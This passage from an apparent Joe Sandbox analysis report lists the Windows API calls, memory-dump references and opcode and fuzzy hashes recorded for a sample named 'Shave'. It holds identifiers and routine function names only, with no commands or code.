                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                • String ID: (Gz
                                                                                                                                • API String ID: 3248276644-3338112938
                                                                                                                                • Opcode ID: a52dea6f46491884bfea8966144719ff55b77873c2b9e35538818f57ee0f9f4e
                                                                                                                                • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                                                                                • Opcode Fuzzy Hash: a52dea6f46491884bfea8966144719ff55b77873c2b9e35538818f57ee0f9f4e
                                                                                                                                • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                                                                                APIs
                                                                                                                                • IsWindowVisible.USER32(?), ref: 004052A2
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                                                                                                                  • Part of subcall function 0040425A: SendMessageW.USER32(?,?,00000000,00000000), ref: 0040426C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                                                                • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                                                                                                                • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                                                                • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00405DDA
                                                                                                                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,007B3000,0040336A,007B5000,007B5800,007B5800,007B5800,007B5800,007B5800,75923420,004035B6), ref: 00405DF5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                • String ID: nsa
                                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                                • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                                                                                • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4
                                                                                                                                APIs
                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D2B
                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D34
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276332072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000003.00000002.3276278297.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276351148.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276373702.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000003.00000002.3276518741.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 190613189-0
                                                                                                                                • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                                                                                • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8